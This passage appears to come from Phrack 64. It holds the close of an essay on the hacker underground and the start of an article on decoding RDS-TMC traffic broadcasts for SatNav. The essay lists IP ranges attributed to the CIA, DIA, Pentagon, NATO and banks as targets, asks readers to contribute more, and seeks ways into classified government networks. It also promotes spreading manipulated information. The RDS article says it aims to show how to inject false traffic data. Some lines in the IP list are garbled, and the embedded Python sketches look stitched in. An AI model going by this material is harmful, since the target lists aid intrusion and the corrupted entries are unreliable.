Top Layer Networks, Narus, Raytheon, Verint, Comverse, SS8, pen-link...) 


* Spoken media (Al Jazeera, Al Arabia, CNN, FOX, BBC, ABC, RTVi, ...)


* Written media or press agencies (NY/LA Times, Washington Post,
Guardian, Le monde, El Pais, The Bild, The Herald, Reuters, AFP, AP,
TASS, UPI...)


* All satellite maintainers (Intelsat, Eurosat, Inmarsat, Eutelsat, 
Astra...) 


* Suspect investment firms (Carlyle, In-Q-Tel...) 


* Advanced research centers (DARPA, ARDA/DTO, HAARP...) 


* Secret societies, fake groups and think-tanks (The Club of Rome, The
Club of Berne, Bilderberg, JASON group, Rachel foundation, CFR, ERT,
UNICE, AIPAC, The Bohemian Club, Opus Dei, Chatham House, Church of
Scientology...)


* Guerrilla groups, rebels or simply alternative groups (FARC, ELN, ETA,
KKK, NPA, IRA, Hamas, Hezbollah, Muslim Brothers...)


* Ministries (Defense, Energy, State, Justice...) 


* Militaries or international police forces (US Army, US Navy, US Air
Force, NATO, European armies, Interpol, Europol, CCU...)


* And last but not least: HONEYPOT! 


It’s obvious that not all ranges can be obtained. Some agencies are
registered under a false name in order to be more discreet (what about
ENISA, the European NSA?), others use some high level systems (VPN,
tor...) on top of normal networks or simply use communication systems
other than the Internet. But we would like to keep the most complete
list we can, and for this we need your help. We need the help of everyone
in the Underground who is ready to share knowledge. Send us your range.


We started to scan the A and B ranges with a little script we made,
but be sure that the most interesting ranges are in class C. Here is a
quick start of the list:


11.0.0.0 - 11.255.255.255 : DoD Network Information Center
144.233.0.0 - 144.233.255.255 : Defense Intelligence Agency
144.234.0.0 - 144.234.255.255 : Defense Intelligence Agency
144.236.0.0 - 144.236.255.255 : Defense Intelligence Agency
144.237.0.0 - 144.237.255.255 : Defense Intelligence Agency
144.238.0.0 - 144.238.255.255 : Defense Intelligence Agency
144.239.0.0 - 144.239.255.255 : Defense Intelligence Agency
144.240.0.0 - 144.240.255.255 : Defense Intelligence Agency
144.241.0.0 - 144.241.255.255 : Defense Intelligence Agency
144.242.0.0 - 144.242.255.255 : Defense Intelligence Agency
162.45.0.0 - 162.45.255.255 : Central Intelligence Agency
162.46.0.0 - 162.46.255.255 : Central Intelligence Agency
130.16.0.0 - 130.16.255.255 : The Pentagon
134.11.0.0 - 134.11.255.255 : The Pentagon
134.152.0.0 - 134.152.255.255 : The Pentagon
134.205.0.0 - 134.205.255.255 : The Pentagon
140.185.0.0 - 140.185.255.255 : The Pentagon
141.116.0.0 - 141.116.255.255 : Army Information Systems Command-Pentagon

-255.255.255 : DoD Network Information Center 

128.20.0.0 - 128.20.255.255 : U.S. Army Research Laboratory
128.63.0.0 - 128.63.255.255 : U.S. Army Research Laboratory
129.229.0.0 - 129.229.255.255 : United States Army Corps of Engineers
131.218.0.0 - 131.218.255.255 : U.S. Army Research Laboratory
134.194.0.0 - 134.194.255.255 : DoD Network Information Center
134.232.0.0 - 134.232.255.255 : DoD Network Information Center
137.128.0.0 - 137.128.255.255 : U.S. ARMY Tank-Automotive Command
144.252.0.0 - 144.252.255.255 : DoD Network Information Center
155.8.0.0 - 155.8.255.255 : DoD Network Information Center
158.3.0.0 - 158.3.255.255 : Headquarters, USAAISC
158.12.0.0 - 158.12.255.255 : U.S. Army Research Laboratory
164.225.0.0 - 164.225.255.255 : DoD Network Information Center
140.173.0.0 - 140.173.255.255 : DARPA ISTO
158.63.0.0 - 158.63.255.255 : Defense Advanced Research Projects Agency
145.237.0.0 - 145.237.255.255 : POLFIN (Ministry of Finance Poland)
163.13.0.0 - 163.32.255.255 : Ministry of Education Computer Center Taiwan
168.187.0.0 - 168.187.255.255 : Kuwait Ministry of Communications
VET 6900S DT 9 259.2295 Ministry of Interior Hungary 
164.49.0.0 - 164.49.255.255 : United States Army Space and Strategic
                              Defense
165.27.0.0 - 165.27.255.255 : United States Cellular Telephone
152.152.0.0 - 152.152.255.255 : NATO Headquarters
128.102.0.0 - 128.102.255.255 : NASA
128.149.0.0 - 128.149.255.255 : NASA
128.154.0.0 - 128.154.255.255 : NASA
128.155.0.0 - 128.155.255.255 : NASA
128.156.0.0 - 128.156.255.255 : NASA
128.157.0.0 - 128.157.255.255 : NASA
128.158.0.0 - 128.158.255.255 : NASA
128.159.0.0 - 128.159.255.255 : NASA
128.161.0.0 - 128.161.255.255 : NASA
128.183.0.0 - 128.183.255.255 : NASA
128.217.0.0 - 128.217.255.255 : NASA
129.50.0.0 - 129.50.255.255 : NASA
153.31.0.0 - 153.31.255.255 : FBI Criminal Justice Information Systems
138.137.0.0 - 138.137.255.255 : Navy Regional Data Automation Center
138.141.0.0 - 138.141.255.255 : Navy Regional Data Automation Center
138.143.0.0 - 138.143.255.255 : Navy Regional Data Automation Center
161.104.0.0 - 161.104.255.255 : France Telecom R&D
161.105.0.0 - 161.105.255.255 : France Telecom R&D
161.106.0.0 - 161.106.255.255 : France Telecom R&D
V5 922112 0%0: = 159-22 1259 6205. Alcanet International (Alcatel) 
158.190.0.0 - 158.190.255.255 : Credit Agricole
158.191.0.0 - 158.191.255.255 : Credit Agricole
158.192.0.0 - 158.192.255.255 : Credit Agricole
165.32.0.0 - 165.48.255.255 : Bank of America
171.128.0.0 - 171.206.255.255 : Bank of America
167.84.0.0 - 167.84.255.255 : The Chase Manhattan Bank
159.50.0.0 - 159.50.255.255 : Banque Nationale de Paris

199% 22°..0 20> = D5 E2225 922 99 Swiss Federal Military Dept. 
163.12.0.0 - 163.12.255.255 : Navy Aviation Supply Office
163.249.0.0 - 163.249.255.255 : Commanding Officer Navy Ships Parts
164.94.0.0 - 164.94.255.255 : Navy Personnel Research
164.224.0.0 - 164.224.255.255 : Secretary of the Navy
34.0.0.0 - 34.255.255.255 : Halliburton Company

13:93 E21 4:0%2 05 S713 9s 20 6259.62.55 Science Applications International 
Corporation 


The last one is definitely interesting; people interested in obscure
technologies should investigate SAIC stuff in depth...


But anyway this list is rough and incomplete. We have a lot more
interesting ranges but they are not yet classified. It’s just to show
you how easy it is to obtain.


If you think that the idea is funny, send us your range. We would be
pleased to include your range in our list. The idea is to offer the most
complete list we can for the next Phrack release.


----[ 5.4. The axis of knowledge 

I’m sure that everyone knows "the axis of evil". This sensational
expression was coined some years ago by Mr. Bush to group wicked
countries (but was it really invented by the "president" or by m1st3r
Karl Rove??). We could use the same expression to name the evil subjects
that we would like to have in Phrack. But I will leave to Mr Powerful
Bush his expression and find a more noble one: The Axis of Knowledge.


So what is it about? Just a list of some topics that we would like to
find more often in Phrack. In the past years, Phrack was mainly focused
on exploitation, shellcode, kernel and reverse engineering. I’m not saying
that this was not interesting, I’m saying that we need to diversify the
articles of Phrack. Everyone agrees that we must know the advances in
heap exploitation but we should also know how to exploit new technologies.

------[ 5.4.1 New Technologies


To illustrate my point, we can take a quote from Phrack 62, the
profiling of Scut:


Q: What suggestions do you have for Phrack?
A: For the article topics, I personally would like to see more articles
on upcoming technologies to exploit, such as SOAP, web services,
.NET, etc.


We think he was right. We need more articles on upcoming technologies.
Hackers have to stay up to date. Low level hacking is interesting but we
also need to adapt ourselves to new technologies.


It could include: RFID, Web2, GPS, Galileo, GSM, UMTS, Grid Computing, 
Smartdust system. 


Also, since the name Phrack is a combination of Phreak and Hack,
having more articles related to Phreaking would be great. If you have
a look at all the Phrack issues from 1 to 30, the majority of articles
talked about Phreaking. And Phreaking and new technologies are closely
connected.


------[ 5.4.2 Hidden and private networks


We would like to have a detailed description of, or at least an
introduction to, the private networks used by governments. It includes:


* Cyber Security Knowledge Transfer Network (KTN)
http://ktn.globalwatchonline.com


* Unclassified but Sensitive Internet Protocol Router Network 
and 
The Secret IP Router Network (SIPRN) 
http://www.disa.mil/main/prodsol/data.html 


* GOVNET 
http://www.govnet.state.vt.us/ 


* Advanced Technology Demonstration Network 
http://www.atd.net/ 


* Global Information Grid (GIG) 
http://www.nsa.gov/ia/industry/gig.cfm?MenuID=10.3.2.2 


There are a lot of private networks in the world and some are not
documented. What we want to know is: how they are implemented, who
is using them, which protocols are being used (is it ATM, SONET...?),
is there a way to access them through the Internet...


If you have any information to share on these networks, we would be
very interested to hear from you.


------[ 5.4.3 Information warfare


Information warfare is probably one of the most interesting upcoming
subjects in recent years. Information is present everywhere and the one
who controls the information will be the master. The USA already
understands this well, China too, but some countries are still behind.
Especially in Europe. Some websites are already specialized in
information warfare, like IWS, the Information Warfare Site
(http://www.iwar.org.uk).


You can also find some schools across the world which are specialized 
in information warfare. 


We, hackers, can use our knowledge and ingenuity to do something
in this domain. Let me give you two examples. The first one is Black Hat
SEO (http://www.blackhatseo.com/). This subject is really interesting
because it combines a lot of subjects like development, hacking,
social engineering, linguistics, artificial intelligence and even
marketing. These techniques can be used in Information Warfare and we
would like the Underground to know more about this subject.


Second example: in a document entitled "Who is n3td3v?" the author
(hacker factor) uses linguistic techniques in order to identify
n3td3v. After having analyzed n3td3v’s text, the author claims that
n3td3v and Gobbles are probably the same person. N3td3v’s answer was
to say that he has an A.I. program allowing him to generate a text
automatically. If he wants to sound like George Bush, he simply has
to find a lot of articles by him, give these texts to his A.I. and
the A.I. program will build a model representing the way that George
Bush writes. Once the model is created, he can give a text to the A.I.
and this text will be translated into "George Bush Speaking". The
author’s answer (hacker factor) was to say it’s not possible.


Since I work in text-mining, I can tell you that it’s possible. The
majority of people working in the academic area are blind and when you
come to them with innovative techniques, they generally tell you that you
are a dreamer. A simple implementation can be realized quickly with the
use of a grammar (that you can even induce automatically), a thesaurus
and markov chains. Add some home made rules and you can have a small
system to modify a text.
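

To make the markov chain part concrete, here is a minimal sketch of a
word-level chain, assuming nothing more than a plain text sample as
input. It only covers the chain itself: the grammar, the thesaurus and
the home made rules are left out, and the function names and the sample
sentence are invented for this illustration.

```python
import random
from collections import defaultdict


def build_model(text, order=1):
    """Map each run of `order` words to the words seen right after it."""
    words = text.split()
    model = defaultdict(list)
    for i in range(len(words) - order):
        key = tuple(words[i:i + order])
        model[key].append(words[i + order])
    return model


def generate(model, length=20, seed=None):
    """Walk the chain from a random starting state."""
    rng = random.Random(seed)
    key = rng.choice(sorted(model))
    order = len(key)
    out = list(key)
    while len(out) < length:
        followers = model.get(tuple(out[-order:]))
        if not followers:
            break  # reached a state that was never followed by anything
        out.append(rng.choice(followers))
    return " ".join(out)


# Placeholder sample text; a real model needs a much larger corpus.
sample = "the scene is dying but the scene is not dead"
model = build_model(sample)
print(generate(model, length=8, seed=1))
```

Every pair of consecutive words in the output also appears in the
sample, which is why text produced this way keeps some of the flavour of
the source. A higher `order` gives more faithful but less varied output.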


An idea could be to release a tool like this (the binary, not the 
source). I already have the title for an article : "Defeating forensic: 
how to cover your says" ! 


More generally, in information warfare, interesting subjects could be: 


* Innovative information retrieval techniques 
* Automatic diffusion of manipulated information 
* Tracking of manipulated information 


Military and advanced centers like DARPA are already interested in 
these topics. We don’t have to let governments have the monopoly on 
these areas. I’m sure we can do much better than governments. 


------[ 5.4.4 Spying System


Everyone knows ECHELON, it’s probably the most documented spying
system in the world. Unfortunately, the majority of the information that
you can find on ECHELON is about where the ECHELON bases in the world
are. There is nothing about how they manipulate data. It’s evident that
they are using some data-mining techniques like speech recognition,
text-cleaning, topic classification, named entity recognition, sentiment
detection and so on. For this they could use their own software or maybe
they are using some commercial software like:


Retrievalware from Convera 
http://www.convera.com/solutions/retrievalware/Default.aspx


Inxight’s products: 
http://www.inxight.com/products/ 


"Minority Report" like system visualization: 
http://starlight.pnl.gov/ 


For now we are like Socrates, all we know is that we know nothing. 
Nothing about how they process data. But we are very interested to know. 


In the same vein, we would like to know more about Narus
(http://www.narus.com/), which could be used as the successor of
CARNIVORE, which was the FBI’s tool to intercept electronic data. Which
countries use Narus, where it is installed, how Narus processes
information...


Actually any system which is supposed to spy on us is interesting. 


--[ 6. Conclusion


I’m reaching the end of my subject. As with every article, some
people will agree with the content and some not. I’m probably not the best
person for talking about the Underground but I tried to summarize in
this text all the interesting discussions I have had over several years
with a lot of people. I tried to analyze the past and present scene and
to give you a snapshot as accurate as possible.


I’m not entirely satisfied, there’s a lot more to say. But if this
article can already make you think about the current scene or
the Underground in general, that means that we are on the right track.


The most important thing to retain is the need to get back the 
Underground spirit. The world changes, people change, the security world 
changes but the Underground has to keep its spirit, the spirit which 
characterized it in the past. 


I gave you some ideas about how we could do it, but there are many
more ideas in 10000 heads than in one. Anyone who worries about the
current scene is invited to give his opinion about how we could do it.


So let’s go for the wakeup of the Underground. THE wakeup. A wakeup
to show to the world that the Underground is not dead. That it will never
die, that it is still alive and will be for a long time.


That’s the responsibility of all hackers around the world.


Phrack #64 file 5


Hijacking RDS-TMC Traffic Information
signals


by Andrea "lcars" Barisani
<lcars@inversepath.com>


Daniele "danbia" Bianco


--[ 1. Introduction


Modern Satellite Navigation systems use a recently developed standard
called RDS-TMC (Radio Data System - Traffic Message Channel) for receiving
traffic information over FM broadcast. The protocol allows communication of
traffic events such as accidents and queues. If information affects the
current route plotted by the user, it is used for calculating and
suggesting detours and alternate routes. We are going to show how to
receive and decode RDS-TMC packets using cheap homemade hardware. The goal
is to understand the protocol so that eventually we may show how trivial it
is to inject false information.


We also include the first release of our Simple RDS Decoder (srdsd is the
lazy name) which as far as we know is the first open source tool available
which tries to fully decode RDS-TMC messages. It’s not restricted to
RDS-TMC since it also performs basic decoding of RDS messages.


The second part of the article will cover transmission of RDS-TMC messages, 
satellite navigator hacking via TMC and its impact for social engineering 
attacks. 


--[ 2. Motivation 


RDS has primarily been used for displaying broadcasting station names on FM
radios and giving alternate frequencies; there has been little value other
than pure research and fun in hijacking it to display custom messages.


However, with the recent introduction of RDS-TMC throughout Europe we are 
seeing valuable data being transmitted over FM that actively affects SatNav 
operations and eventually the driver’s route choice. This can 
have very important social engineering consequences. Additionally, RDS-TMC 
messages can be an attack vector against SatNav parsing capabilities. 


Considering the increasing importance of these systems’ role in car
operation (they are no longer strictly limited to route plotting)
and their human interaction, they represent an interesting target, combined
with the "cleartext" and un-authenticated nature of RDS/RDS-TMC messages.


We’ll explore the security aspects in Part II.


The Radio Data System standard is widely adopted on pretty much every
modern FM radio, 99.9% of all car FM radio models feature RDS nowadays. 
The standard is used for transmitting data over FM broadcasts and RDS-TMC 
is a subset of the type of messages it can handle. The RDS standard is 
described in the European Standard 50067. 


The most recognizable data transmitted over RDS is the station name, which
is often shown on your radio display. Other information includes alternate
frequencies for the station (that can be tried when the signal is lost),
descriptive information about the program type, traffic announcements (most
radios can be set up to interrupt CD and/or tape playing and switch to radio
when a traffic announcement is detected), time and date and many more,
including TMC messages.


In an FM transmission the RDS signal is transmitted on a 57 kHz subcarrier
in order to separate the data channel from the Mono and/or Stereo audio.


FM Spectrum:


    Mono       Pilot Tone     Stereo (L-R)       RDS Signal

 ||||||||||        |      ||||||||| |||||||||        ||
 ||||||||||        |      ||||||||| |||||||||        ||
 ||||||||||        |      ||||||||| |||||||||        ||
                  19k    23k       38k      53k      57k  Freq (Hz)


The RDS signal is sampled against a clock frequency of 1.1875 kHz, which
means that the data rate is 1187.5 bit/s (with a maximum deviation of +/-
0.125 bit/s).

The wave amplitude is decoded into a binary representation, so the actual
data stream is a friendly sequence of '1' and '0'.


The smallest RDS "packet" is called a Block; 4 Blocks make up a Group. Each
Block has 26 bits of information, making a Group 104 bits large.
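
To put these numbers in perspective, here is a small sketch of the
arithmetic. It assumes (as the RDS standard specifies, but the text above
does not state) that the bit clock is the 57 kHz subcarrier divided by 48;
the variable names are ours.

```python
# Timing figures for RDS, derived from the 57 kHz subcarrier.
# Assumption: the bit clock is the subcarrier divided by 48.
SUBCARRIER_HZ = 57_000
CLOCK_DIVIDER = 48
BITS_PER_BLOCK = 26
BLOCKS_PER_GROUP = 4

bit_rate = SUBCARRIER_HZ / CLOCK_DIVIDER            # bit/s
bits_per_group = BITS_PER_BLOCK * BLOCKS_PER_GROUP  # bits in one Group
group_time_ms = 1000 * bits_per_group / bit_rate    # milliseconds per Group
groups_per_second = bit_rate / bits_per_group

print(f"bit rate:       {bit_rate} bit/s")
print(f"group size:     {bits_per_group} bits")
print(f"group duration: {group_time_ms:.1f} ms")
print(f"groups/second:  {groups_per_second:.1f}")
```

In other words a receiver sees roughly eleven Groups per second, which is
all the bandwidth every RDS feature (TMC included) has to share.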


Group structure (104 bits): 


| Block 1 | Block 2 | Block 3 | Block 4 | 


Block structure (26 bits): 


| Data (16 bits) | Checkword (10 bits) | 


The Checkword is a checksum included in every Block, computed for error
protection: the very nature of analog radio transmission introduces many
errors in data streams. The algorithm used is fully specified in the
standard and it doesn't concern us for the moment.
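
As a minimal sketch of the layout just described, the following splits a
104 bit Group into its four (Data, Checkword) pairs. The function name is
ours, the input is assumed to be a clean string of '0'/'1' characters and
the Checkword is only extracted, not verified.

```python
def split_group(bits):
    """Split a 104-character '0'/'1' string into four (data, checkword) pairs."""
    if len(bits) != 104 or set(bits) - {"0", "1"}:
        raise ValueError("expected exactly 104 binary digits")
    blocks = []
    for start in range(0, 104, 26):
        block = bits[start:start + 26]
        data = int(block[:16], 2)        # first 16 bits: Data
        checkword = int(block[16:], 2)   # last 10 bits: Checkword
        blocks.append((data, checkword))
    return blocks


# The raw Group shown later in this article (PI 5401), block by block.
group = (
    "0101010000000001" "1111011001"
    "0000010000101000" "1100101100"
    "0000001000010100" "0000110010"
    "0101001001000001" "0001101110"
)
for number, (data, checkword) in enumerate(split_group(group), start=1):
    print(f"Block {number}: data={data:04x} checkword={checkword:010b}")
```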


Here’s a representation of the most basic RDS Group: 


Block 1:

  | PI code | Checkword |

      PI code   = 16 bits
      Checkword = 10 bits

Block 2:

  | Group code | B0 | TP | PTY | <5 bits> | Checkword |

      Group code = 4 bits
      B0         = 1 bit
      TP         = 1 bit
      PTY        = 5 bits
      Checkword  = 10 bits

Block 3:

  | Data | Checkword |

      Data      = 16 bits
      Checkword = 10 bits

Block 4:

  | Data | Checkword |

      Data      = 16 bits
      Checkword = 10 bits


The PI code is the Programme Identification code; it identifies the radio
station that's transmitting the message. Every broadcaster has a unique
assigned code.


The Group code identifies the type of message being transmitted, as RDS can
be used for transmitting several different message formats. Type 0A (00000)
and 0B (00001) for instance are used for tuning information (the five bits
shown are the 4 bit Group code followed by the B0 bit). RDS-TMC messages
are transmitted in 8A (10000) groups. Depending on the Group type the
remaining 5 bits of Block 2 and the Data part of Block 3 and Block 4 are
used according to the relevant Group specification.


The 'B0' bit is the version code, '0' stands for RDS version A, '1' stands
for RDS version B.


The TP bit stands for Traffic Programme and identifies if the station is
capable of sending traffic announcements (in combination with the TA code
present in 0A, 0B, 14B, 15B type messages); it has nothing to do with
RDS-TMC and it refers to audio traffic announcements only.


The PTY code is used for describing the Programme Type, for instance code 1
(converted in decimal from its binary representation) is 'News' while code
4 is 'Sport'.
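
The Block 2 fields can be pulled apart with a few shifts and masks. This
is only a sketch: the function and dictionary names are ours and the PTY
table holds just the two codes named above.

```python
PTY_NAMES = {1: "News", 4: "Sport"}  # only the codes mentioned in the text


def decode_block2(data):
    """Split the 16 Data bits of Block 2 into the fields described above."""
    return {
        "group_code": (data >> 12) & 0xF,   # 4 bits
        "b0": (data >> 11) & 0x1,           # version: 0 = A, 1 = B
        "tp": (data >> 10) & 0x1,           # Traffic Programme flag
        "pty": (data >> 5) & 0x1F,          # Programme Type
        "rest": data & 0x1F,                # 5 bits, meaning depends on Group
    }


def group_name(fields):
    """Return the usual notation, e.g. '0A' or '8A'."""
    return f"{fields['group_code']}{'AB'[fields['b0']]}"


fields = decode_block2(0b0000010000101000)
print(group_name(fields), fields, PTY_NAMES.get(fields["pty"], "?"))
```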


--[ 4. RDS-TMC 


Traffic Message Channel packets carry information about traffic events,
their location and the duration of the event. A number of lookup tables are
used to correlate event codes to their description and location codes to
GPS coordinates; those tables are expected to be present in our SatNav
memory. The RDS-TMC standard is described in International Standard (ISO)
14819-1.


All the most recent SatNav systems support RDS-TMC to some degree. Some
systems require the purchase of an external antenna in order to correctly
receive the signal, while modern ones integrated in the car cockpit use the
existing FM antenna used by the radio system. The interface of the SatNav
allows display of the list of received messages and prompts detours upon
events that affect the current route.


TMC packets are transmitted as type 8A (10000) Groups and they can be
divided into two categories: Single Group messages and Multi Group messages.
Single Group messages have bit number 13 of Block 2 set to '1', Multi Group
messages have bit number 13 of Block 2 set to '0'.


Here’s a Single Group RDS-TMC message: 


Block 1:

  | PI code | Checkword |

      PI code   = 16 bits
      Checkword = 10 bits

Block 2:

  | Group code | B0 | TP | PTY | T | F | DP | Checkword |

      Group code = 4 bits
      B0         = 1 bit
      TP         = 1 bit
      PTY        = 5 bits
      T          = 1 bit
      F          = 1 bit
      DP         = 3 bits
      Checkword  = 10 bits

Block 3:

  | D | PN | Extent | Event | Checkword |

      D         = 1 bit
      PN        = 1 bit
      Extent    = 3 bits
      Event     = 11 bits
      Checkword = 10 bits

Block 4:

  | Location | Checkword |

      Location  = 16 bits
      Checkword = 10 bits


We can see the usual data which we already discussed for RDS as well as new
information (the <5 bits> are now described).

We already mentioned the 'F' bit, it's bit number 13 of Block 2 and it
identifies the message as a Single Group (F = 1) or Multi Group (F = 0).

The 'T', 'F' and 'D' bits are used in Multi Group messages for identifying if
this is the first group (TFD = 001) or a subsequent group (TFD = 000) in the
stream.

The 'DP' field stands for duration and persistence, it contains information
about the timeframe of the traffic event so that the client can
automatically flush old ones.

The 'D' bit tells the SatNav if diversion advice needs to be prompted or
not.

The 'PN' bit (Positive/Negative) indicates the direction of queue events,
it's opposite to the road direction since it represents the direction of the
growth of a queue (or any directional event).

The 'Extent' data shows the extension of the current event, it is measured
in terms of nearby Location Table entries.

The 'Event' part contains the 11 bit Event code, which is looked up on the
local Event Code table stored on the SatNav memory. The 'Location' part
contains the 16 bit Location code which is looked up against the Location
Table database, also stored on your SatNav memory, some countries allow a
free download of the Location Table database (like Italy[1]).


Multi Group messages are a sequence of two or more 8A groups and can
contain additional information such as speed limit advices and
supplementary information.
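
The Single Group layout can be sketched in a few lines. The function name
and dictionary keys below are ours; the sample values are the Block 3 and
Block 4 contents of the 8A frame shown in the decoder output later in this
article, with Block 2 rebuilt from the fields printed there.

```python
def decode_tmc_single(block2, block3, block4):
    """Decode the TMC fields of a Single Group 8A message (Data bits only)."""
    if (block2 >> 11) != 0b10000:
        raise ValueError("not an 8A group")
    fields = {
        "t": (block2 >> 4) & 0x1,
        "f": (block2 >> 3) & 0x1,           # bit number 13 of Block 2
        "dp": block2 & 0x7,                 # duration and persistence
        "diversion": (block3 >> 15) & 0x1,  # D
        "direction": (block3 >> 14) & 0x1,  # PN
        "extent": (block3 >> 11) & 0x7,
        "event": block3 & 0x7FF,            # 11 bit Event code
        "location": block4,                 # 16 bit Location code
    }
    if fields["f"] != 1:
        raise ValueError("Multi Group message, not handled in this sketch")
    return fields


message = decode_tmc_single(
    0b1000010100101000,   # 8A, TP = 1, PTY = 9, T/F/DP = 0 1 000
    0b0101100001110011,
    0b0000110000001100,
)
print(message)
```

The Event and Location values still have to be looked up in the respective
tables, which is what the decoder presented later does.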


--[ 5. Sniffing circuitry 


Sniffing RDS traffic basically requires three components:


1. FM radio with MPX output
2. RDS signal demodulator
3. RDS protocol decoder

The first element is an FM radio receiver capable of giving us a signal that
has not already been demodulated into its different components, since we
need access to the RDS subcarrier (and an audio only output would do no
good). This kind of "raw" signal is called MPX (Multiplex). The easiest way
to get such a signal is to buy a standard PCI Video card that carries a
tuner which has an MPX pin that we can hook to.


One of these tuners is the Philips FM1216[2] (available in different
"flavours", they all do the trick) which provides pin 25 for this purpose.
It's relatively easy to identify a PCI Video card that uses this tuner; we
used the WinFast DV2000. An extensive database[3] is available.


Once we get the MPX signal it can then be connected to an RDS signal
demodulator which will perform the de-modulation and give us parsable
data. Our choice is the ST Microelectronics TDA7330B[4], a commercially
available chip used in most radios capable of RDS de-modulation. Another
possibility could be the Philips SAA6579[5]; it offers the same
functionality as the TDA7330, though pinning might differ.


Finally we use a custom PIC (Peripheral Interface Controller) for preparing
and sending the information generated by the TDA7330 to something that we
can understand and use, like a standard serial port.


The PIC takes DATA, QUAL and CLOCK from the demodulator and "creates" a
stream good enough to be sent to the serial port. Our PIC uses only two
pins of the serial port (RX - RTS); it prints out ascii '0' and '1'
clocked at 19200 baud rate with one start bit and two stop bits, no parity
bit is used.
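
To see why 19200 baud is comfortable for this job, here is a sketch of the
8-N-2 framing and the resulting throughput. It assumes the usual
LSB-first UART bit order and one transmitted character per RDS bit; the
names are ours.

```python
RDS_BIT_RATE = 1187.5   # bit/s coming out of the demodulator
BAUD = 19200            # serial line speed


def frame_8n2(char):
    """Line states for one character: start bit, 8 data bits LSB first, 2 stop bits."""
    code = ord(char)
    data_bits = [(code >> i) & 1 for i in range(8)]
    return [0] + data_bits + [1, 1]


frame = frame_8n2("1")
chars_per_second = BAUD / len(frame)

print(frame)
print(f"{len(frame)} bit times per character, {chars_per_second:.0f} chars/s")
print("serial link keeps up:", chars_per_second > RDS_BIT_RATE)
```

Each RDS bit costs 11 bit times on the wire, so the link still has room to
spare at 1187.5 bit/s.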


As you can see the PIC makes our life easier: in order to see the raw
stream we only have to connect the circuit and attach a terminal to the
serial port, no particular driver is needed. The PIC we use is a PIC 16F84;
this microcontroller is cheap and easy to work with (its assembly has only
35 instructions), furthermore a programmer for setting up the chip can be
easily bought or assembled. If you want to build your own programmer a good
choice would be uJDM[6], it's one of the simplest PIC programmers available
(it is a variation of the famous JDM programmer).


At last we need to convert signals from the PIC to RS232 compatible signal
levels. This is needed because the PIC and other integrated circuits work
with TTL (Transistor to Transistor Logic - 0V/+5V) levels, whereas serial
port signal levels are -12V/+12V. The easiest approach for converting the
signal is using a Maxim RS-232[7]. It is a specialized driver and receiver
integrated circuit used to convert between TTL logic levels and RS-232
compatible signal levels.


Here's the diagram of the setup:


   antenna
      |
      v
 [ FM tuner (FM1216) ]
      |
      | MPX (pin 25)
      v
 [ RDS demodulator (TDA7330) - MUXIN ]
      |         |         |
      | QUAL    | DATA    | CLOCK
      v         v         v
 [ PIC 16F84 ]
      |              |
      | DATA out     | RTS out
      v              v
 [ TTL <-> RS232 level converter ]
      |              |
      | RX (pin 2)   | RTS (pin 7)
      v              v
 [ Serial Port (DB9 connector) ]


Here's the commented assembler code for our PIC:


;
; Copyright 2007 Andrea Barisani <lcars@inversepath.com>
;                Daniele Bianco  <danbia@inversepath.com>
;
; Permission to use, copy, modify, and distribute this software for any
; purpose with or without fee is hereby granted, provided that the above
; copyright notice and this permission notice appear in all copies.
;
; THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
; WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
; MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
; ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
; WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
; ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
; OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
;
; Pin diagram:
;
;                     1  ______  18
;                x   -|  U   |-  -> DATA out (to RS232)
;                x   -|      |-  -> RTS out  (to RS232)
;                x   -|  1   |-  <- OSC1 / CLKIN
;          MCLR  ->  -|  6   |-  -> OSC2 / CLKOUT
;     Vss (gnd)  ->  -|  F   |-  <- Vdd (+5V)
;          DATA  ->  -|  8   |-  x
;          QUAL  ->  -|  4   |-  x
;         CLOCK  ->  -|      |-  x
;                x   -|______|-  x
;                     9       10
;
; Connection description:
;
; pin 4 : MCLR          (it must be connected to Vdd through a resistor
;                        to prevent PIC reset - 10K is a good resistor)
; pin 5 : Vss           (directly connected to gnd)
;
; pin 6 : DATA  input   (directly connected to RDS demodulator DATA  out)
; pin 7 : QUAL  input   (directly connected to RDS demodulator QUAL  out)
; pin 8 : CLOCK input   (directly connected to RDS demodulator CLOCK out)
;
; pin 14: Vdd           (directly connected to +5V)
; pin 15: OSC2 / CLKOUT (connected to a 2.4576 MHz oscillator crystal* )
; pin 16: OSC1 / CLKIN  (connected to a 2.4576 MHz oscillator crystal* )
;
; pin 17: RTS  output   (RS232 - ''RTS'' pin 7 on DB9 connector** )
; pin 18: DATA output   (RS232 - ''RX''  pin 2 on DB9 connector** )
;
; pin 1,2,3,9,10,11,12,13: unused
;
; *)
; We can connect the oscillator crystal to the PIC using this simple
; circuit:
;
;             C1 (15-33 pF)
;          ____||____ ______ OSC1 / CLKIN
;         |    ||    |
;         |         ___
;  gnd ---|          =  XTAL (2.4576 MHz)
;         |         ___
;         |____||____|______
;              ||            OSC2 / CLKOUT
;             C2 (15-33 pF)
;
; **)
; We have to convert signals TTL <-> RS232 before we send/receive them
; to/from the serial port.
;
; Serial terminal configuration:
; 8-N-2 (8 data bits - No parity - 2 stop bits)
;
; HARDWARE CONF -----------------------------------------------------------

        PROCESSOR       16f84
        RADIX           DEC
        INCLUDE         "p16f84.inc"

        ERRORLEVEL      -302            ; suppress warnings for bank1

        __CONFIG        1111111110001b  ; Code Protection disabled
                                        ; Power Up Timer enabled
                                        ; WatchDog Timer disabled
                                        ; Oscillator type XT

; DEFINE ------------------------------------------------------------------

#define Bank0           bcf STATUS, RP0 ; activates bank 0
#define Bank1           bsf STATUS, RP0 ; activates bank 1

#define Send_0          bcf PORTA, 1    ; send 0 to RS232 RX
#define Send_1          bsf PORTA, 1    ; send 1 to RS232 RX

#define Skip_if_C       btfss STATUS, C ; skip if C FLAG is set

#define RTS             PORTA, 0        ; RTS pin RA0
#define RX              PORTA, 1        ; RX pin RA1
#define DATA            PORTB, 0        ; DATA pin RB0
#define QUAL            PORTB, 1        ; QUAL pin RB1
#define CLOCK           PORTB, 2        ; CLOCK pin RB2

